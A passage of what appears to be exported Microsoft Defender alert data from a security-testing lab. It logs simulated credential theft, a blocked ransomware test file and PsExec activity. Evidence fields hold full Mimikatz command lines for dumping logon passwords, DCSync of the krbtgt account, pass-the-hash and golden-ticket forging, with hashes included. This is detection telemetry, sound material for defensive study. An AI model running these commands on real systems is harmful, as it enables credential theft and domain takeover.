"accountName": "SYSTEM",
"detectionStatus": "Detected",
"deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48",
"domainName": "NT AUTHORITY",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:36:19.78Z",
"fileName": "PSEXESVC.exe",
"filePath": "C:\\Windows",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-16T03:32:19.0279725Z",
"parentProcessFileName": "services.exe",
"parentProcessFilePath": "C:\\Windows\\System32",
"parentProcessId": 620,
"processCommandLine": "PSEXESVC.exe",
"processCreationTime": "2022-11-21T02:33:21.1761631Z",
"processId": 7748,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db",
"sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748",
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-18",
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
da638045930199825735_1916178811 | 65a2531d-394f-42c9-999c-1435a314339e | 765 | MicrosoftDefenderForEndpoint | 2022-11-21T02:03:39.9825986Z | 2022-11-21T02:34:51.19Z | null | 2022-11-21T02:01:44.3120047Z | 2022-11-21T02:32:59.4225944Z | Malicious credential theft tool execution detected | A known credential theft tool execution command line was detected.
Either the process itself or its command line indicated an intent to dump users' credentials, keys, plain-text passwords and more. | CredentialAccess | New | High | null | UnsupportedAlertType | null | null | WindowsDefenderAtp | f5d3c5d8-ec3a-4412-ab45-934d8faff42c | null | null | null | [
"T1003"
] | [
{
"aadDeviceId": null,
"defenderAvStatus": "Updated",
"deviceDnsName": "msdxv2-win10v.msdxv2.m365dpoc.com",
"firstSeen": "2022-08-08T08:51:02.455Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "jeff",
"domainName": "MSDXV2"
}
],
"mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"onboardingStatus": "Onboarded",
"osBuild": 17763,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "Full Auto Clients",
"riskScore": "Low",
"tags": [
"Full auto"
],
"version": "1809",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0"
}
}
] | [
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": null,
"deviceId": null,
"domainName": "msdxv2.m365dpoc",
"entityType": "User",
"evidenceCreationTime": "2022-11-21T02:03:40.3033333Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": null,
"entityType": "File",
"evidenceCreationTime": "2022-11-21T02:03:40.3033333Z",
"fileName": "Get-KRBTicket.ps1",
"filePath": "C:\\M365DAttack",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "8cd78c31fcbe15d0c3ae78c06e5136983b438586",
"sha256": "5dbd299b13a978274d1a2bf59b58abc66277896c3ab867783f226750d620e4e1",
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": null,
"entityType": "File",
"evidenceCreationTime": "2022-11-21T02:23:43.0433333Z",
"fileName": "Get-KRBTicket.ps1",
"filePath": "C:\\M365DAttack",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "9f01ec196f6e324de6587a716fce47a75fc73bae",
"sha256": "e12d110a9b4837e7495dee781e0ea9b3b753dd2ded7ff0576f7479234d4322da",
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-11-18T04:50:04.1566667Z | Suspicious | None | Takeshi | malicious.io | S-1-5-21-7316772-2057538409-3008203053-1001 | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | Process | 2022-09-30T06:16:01.7066667Z | Suspicious | Active | SYSTEM | NT AUTHORITY | S-1-5-18 | null | null | 16b6990ada0b0ccee28440afc00f9aa6bdc45f62 | cc9b3a6c057ca31d0886c8efb7965a4c47e2d80fd0185d9b9fa55c5dc1d0dc55 | ntoskrnl.exe | C:\Windows\System32 | 4 | null | 2022-09-15T03:19:28.401449Z | null | null | null | null | Detected | 36150b3c1b69b5c2da9df4efd86ac6c166924a48 |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | Process | 2022-11-11T08:20:15.65Z | Suspicious | None | admin | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1104 | e848b07a-87af-4448-9979-09f0b809c8d4 | jeff@msdxv2.m365dpoc.com | 70df765f554ed7392200422c18776b8992c09231 | 912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9 | mimikatz.exe | C:\M365DAttack\Mimikatz\x64 | 816 | "mimikatz.exe" privilege::debug "sekurlsa::pth /user:ronhd /ntlm:96def1a633fc6790124d5f8fe21cc72b /domain:msdxv2.m365dpoc.com /run:\"powershell.exe dir \\msdxv2-win10b\C$ >> C:\M365DAttack\Step3-PasstheHash.txt\"" exit | 2022-11-11T08:17:06.6760783Z | 4,704 | 2022-11-11T08:16:44.2952776Z | powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0 | Detected | c7e147cb0eb3534a4dcea5acb8e61c933713b145 |
da638001152861365786_1066719315 | 0001b09e-7603-4f3e-af36-e744217a8a08 | 486 | MicrosoftDefenderForEndpoint | 2022-09-30T06:14:46.1365973Z | 2022-11-19T01:35:42.7033333Z | 2022-10-01T01:36:00.5066667Z | 2022-09-30T06:11:54.4489902Z | 2022-09-30T06:11:54.4489902Z | Malicious credential theft tool execution detected | A known credential theft tool execution command line was detected.
Either the process itself or its command line indicated an intent to dump users' credentials, keys, plain-text passwords and more. | CredentialAccess | Resolved | High | null | UnsupportedAlertType | TruePositive | SecurityTesting | WindowsDefenderAtp | f5d3c5d8-ec3a-4412-ab45-934d8faff42c | msftadmin@msdxv2.m365dpoc.com | null | null | [
"T1003"
] | [
{
"aadDeviceId": null,
"defenderAvStatus": "Updated",
"deviceDnsName": "msdxv2-win10v.msdxv2.m365dpoc.com",
"firstSeen": "2022-08-08T08:51:02.455Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "jeff",
"domainName": "MSDXV2"
}
],
"mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"onboardingStatus": "Onboarded",
"osBuild": 17763,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "Full Auto Clients",
"riskScore": "Low",
"tags": [
"Full auto"
],
"version": "1809",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0"
}
}
] | [
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": null,
"deviceId": null,
"domainName": "msdxv2.m365dpoc",
"entityType": "User",
"evidenceCreationTime": "2022-09-30T06:14:46.34Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": null,
"entityType": "File",
"evidenceCreationTime": "2022-09-30T06:14:46.34Z",
"fileName": "Step3-PasstheHash.txt",
"filePath": "C:\\M365DAttack",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "0b777e92992c7a306b8a28c7994078e334000781",
"sha256": "ba304316603a46ebca501de75bf7cf05c32e885e5b1120e0b94827002d0d1ad6",
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | Process | 2022-11-21T02:03:39.9733333Z | Suspicious | None | jeff | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1104 | e848b07a-87af-4448-9979-09f0b809c8d4 | jeff@msdxv2.m365dpoc.com | 70df765f554ed7392200422c18776b8992c09231 | 912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9 | mimikatz.exe | C:\M365DAttack\Mimikatz\x64 | 3,516 | type secret.txt | 2022-11-21T02:01:38.4465922Z | 11,068 | 2022-11-21T02:01:28.4753286Z | powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0 | Detected | c7e147cb0eb3534a4dcea5acb8e61c933713b145 |
da638065313870704675_665906736 | f59b47db-e0b1-405c-b0dd-8db85a2d2ac2 | 794 | MicrosoftDefenderForEndpoint | 2022-12-13T12:29:47.0704848Z | 2022-12-13T12:35:25.2966667Z | null | 2022-12-13T12:18:08.8646399Z | 2022-12-13T12:18:08.8646399Z | 'Encryptest' ransomware was prevented | Ransomware use common methods to encrypt files using keys that are known only to attackers. As a result, victims are unable to access the contents of the encrypted files. Most ransomware display or drop a ransom note—an image or an HTML file that contains information about how to obtain the attacker-supplied decryption tool for a fee.
To target documents or other files that contain user data, some ransomware look for files in certain locations and files with certain extension names. It is also common for ransomware to rename encrypted files so that they all use the same extension name.
This detection might indicate that the malware was stopped from delivering its payload. However, it is prudent to check the machine for signs of infection. | Ransomware | New | Medium | 58 | PendingApproval | null | null | WindowsDefenderAv | 51d03c45-b142-4de4-95df-01b0c259d8f6 | null | null | Encryptest | [] | [
{
"aadDeviceId": null,
"defenderAvStatus": "Unknown",
"deviceDnsName": "lab.net",
"firstSeen": "2022-12-13T12:00:55.9665485Z",
"healthStatus": "Active",
"loggedOnUsers": [],
"mdatpDeviceId": "50ffd07170283e077006618b8afafeaecc185857",
"onboardingStatus": "Onboarded",
"osBuild": 19043,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "UnassignedGroup",
"riskScore": "Medium",
"tags": [],
"version": "21H1",
"vmMetadata": null
}
] | [
{
"aadUserId": null,
"accountName": null,
"detectionStatus": "Prevented",
"deviceId": "50ffd07170283e077006618b8afafeaecc185857",
"domainName": null,
"entityType": "File",
"evidenceCreationTime": "2022-12-13T12:29:47.34Z",
"fileName": "UNSIGNED_ransomware_test_exe.exe",
"filePath": "C:\\M365DPoCLab\\Simulation Files\\Attack Surface Reduction\\Block Execution of untrusted or unsigned executables inside removable USB media",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Prevented",
"remediationStatusDetails": "Entity was pre-remediated by Windows Defender",
"sha1": "34dfe1b9798d8c5a67490d0e5f84d2e1a6ba4004",
"sha256": "59086539186f7b7b814ed93f181c2a8040c0cc1b88cde1a219e4bbaaf568b073",
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Malicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": "Prevented",
"deviceId": "50ffd07170283e077006618b8afafeaecc185857",
"domainName": null,
"entityType": "File",
"evidenceCreationTime": "2022-12-13T12:29:49.12Z",
"fileName": "ransomware_testfile_unsigned.exe",
"filePath": "C:\\M365DPoCLab\\Simulation Files\\Controlled Folder Access",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Prevented",
"remediationStatusDetails": "Entity was pre-remediated by Windows Defender",
"sha1": "34dfe1b9798d8c5a67490d0e5f84d2e1a6ba4004",
"sha256": "59086539186f7b7b814ed93f181c2a8040c0cc1b88cde1a219e4bbaaf568b073",
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Malicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-12-14T13:46:19.8866667Z | Suspicious | None | hacker | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1110 | 598763ac-48bb-4671-9472-6be219756e33 | darol@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-11-21T02:04:35.09Z | Suspicious | None | ronhd | internal.corp | S-1-5-21-2300221942-1987151257-321556088-1111 | 89b6fc86-af84-47b2-a72d-325362598b2c | ronhd@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-11-18T05:13:00.7233333Z | Suspicious | None | admin | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1104 | e848b07a-87af-4448-9979-09f0b809c8d4 | jeff@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
da638045930212799134_-270199467 | 67e70048-1466-4a32-83ce-4b5a518a3324 | 765 | MicrosoftDefenderForEndpoint | 2022-11-21T02:03:41.2799368Z | 2022-11-21T03:45:17.6166667Z | 2022-11-21T03:45:17.4759763Z | 2022-11-21T02:01:44.3120047Z | 2022-11-21T02:33:53.306249Z | Mimikatz credential theft tool | The Mimikatz hacktool was detected on this device. Mimikatz is a credential theft tool that can harvest plaintext passwords, password hashes, smartcard PINs, and Kerberos tickets. An attacker might be trying to harvest credentials to log into this or other devices on the network, by impersonating a valid user. | CredentialAccess | Resolved | High | 50 | SuccessfullyRemediated | null | null | WindowsDefenderAv | 8cac979e-6dcc-44ad-8355-480eebaff1c1 | null | null | Mimikatz | [] | [
{
"aadDeviceId": null,
"defenderAvStatus": "Updated",
"deviceDnsName": "internal.corp",
"firstSeen": "2022-08-08T08:51:02.455Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "jeff",
"domainName": "MSDXV2"
}
],
"mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"onboardingStatus": "Onboarded",
"osBuild": 17763,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "Full Auto Clients",
"riskScore": "High",
"tags": [
"Full auto"
],
"version": "1809",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0"
}
}
] | [
{
"aadUserId": null,
"accountName": null,
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": null,
"entityType": "File",
"evidenceCreationTime": "2022-11-21T02:03:41.3233333Z",
"fileName": "mimikatz.exe",
"filePath": "C:\\M365DAttack\\Mimikatz\\x64",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "70df765f554ed7392200422c18776b8992c09231",
"sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9",
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": null,
"deviceId": null,
"domainName": "msdxv2.m365dpoc",
"entityType": "User",
"evidenceCreationTime": "2022-11-21T02:14:25.5266667Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:14:25.5266667Z",
"fileName": "mimikatz.exe",
"filePath": "C:\\M365DAttack\\Mimikatz\\x64",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "\\Device\\HarddiskVolume4\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 11068,
"processCommandLine": "\"mimikatz.exe\" privilege::debug \"lsadump::backupkeys /system:msdxv2-dc.msdxv2.m365dpoc.com /export\" exit",
"processCreationTime": "2022-11-21T02:02:27.0051694Z",
"processId": 8844,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "70df765f554ed7392200422c18776b8992c09231",
"sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:14:25.6Z",
"fileName": "mimikatz.exe",
"filePath": "C:\\M365DAttack\\Mimikatz\\x64",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "\\Device\\HarddiskVolume4\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 11068,
"processCommandLine": "\"mimikatz.exe\" \"lsadump::dcsync /domain:msdxv2.m365dpoc.com /user:krbtgt\" exit",
"processCreationTime": "2022-11-21T02:02:27.1310359Z",
"processId": 9780,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "70df765f554ed7392200422c18776b8992c09231",
"sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:14:54.2366667Z",
"fileName": "mimikatz.exe",
"filePath": "C:\\M365DAttack\\Mimikatz\\x64",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "\\Device\\HarddiskVolume4\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 11068,
"processCommandLine": "\"mimikatz.exe\" privilege::debug \"kerberos::golden /domain:msdxv2.m365dpoc.com /sid:S-1-5-21-1296854425-3029985372-4181197820 /krbtgt: /user:Steve /ticket:C:\\M365DAttack\\Admin-Tickets\\ticket.kirbi /ptt\" exit",
"processCreationTime": "2022-11-21T02:02:27.4595079Z",
"processId": 8332,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "70df765f554ed7392200422c18776b8992c09231",
"sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:18:07.02Z",
"fileName": "mimikatz.exe",
"filePath": "C:\\M365DAttack\\Mimikatz\\x64",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "\\Device\\HarddiskVolume4\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 11068,
"processCommandLine": "\"mimikatz.exe\" privilege::debug \"lsadump::backupkeys /system:msdxv2-dc.msdxv2.m365dpoc.com /export\" exit",
"processCreationTime": "2022-11-21T02:06:53.5444799Z",
"processId": 10200,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "70df765f554ed7392200422c18776b8992c09231",
"sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:18:07.0533333Z",
"fileName": "mimikatz.exe",
"filePath": "C:\\M365DAttack\\Mimikatz\\x64",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "\\Device\\HarddiskVolume4\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 11068,
"processCommandLine": "\"mimikatz.exe\" privilege::debug \"kerberos::golden /domain:msdxv2.m365dpoc.com /sid:S-1-5-21-1296854425-3029985372-4181197820 /krbtgt:334c5cf2bab300e3e456e328f5c699d3 /user:Steve /ticket:C:\\M365DAttack\\Admin-Tickets\\ticket.kirbi /ptt\" exit",
"processCreationTime": "2022-11-21T02:06:53.9715954Z",
"processId": 6948,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "70df765f554ed7392200422c18776b8992c09231",
"sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:18:07.1666667Z",
"fileName": "mimikatz.exe",
"filePath": "C:\\M365DAttack\\Mimikatz\\x64",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "\\Device\\HarddiskVolume4\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 11068,
"processCommandLine": "\"mimikatz.exe\" \"lsadump::dcsync /domain:msdxv2.m365dpoc.com /user:krbtgt\" exit",
"processCreationTime": "2022-11-21T02:06:53.7913003Z",
"processId": 1912,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "70df765f554ed7392200422c18776b8992c09231",
"sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:22:52.8033333Z",
"fileName": "mimikatz.exe",
"filePath": "C:\\M365DAttack\\Mimikatz\\x64",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "\\Device\\HarddiskVolume4\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 11068,
"processCommandLine": "\"mimikatz.exe\" privilege::debug sekurlsa::logonpasswords exit",
"processCreationTime": "2022-11-21T02:11:22.0003786Z",
"processId": 8320,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "70df765f554ed7392200422c18776b8992c09231",
"sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:23:45.7366667Z",
"fileName": "mimikatz.exe",
"filePath": "C:\\M365DAttack\\Mimikatz\\x64",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 11068,
"processCommandLine": "\"mimikatz.exe\" privilege::debug \"lsadump::backupkeys /system:msdxv2-dc.msdxv2.m365dpoc.com /export\" exit",
"processCreationTime": "2022-11-21T02:11:50.2848714Z",
"processId": 2256,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
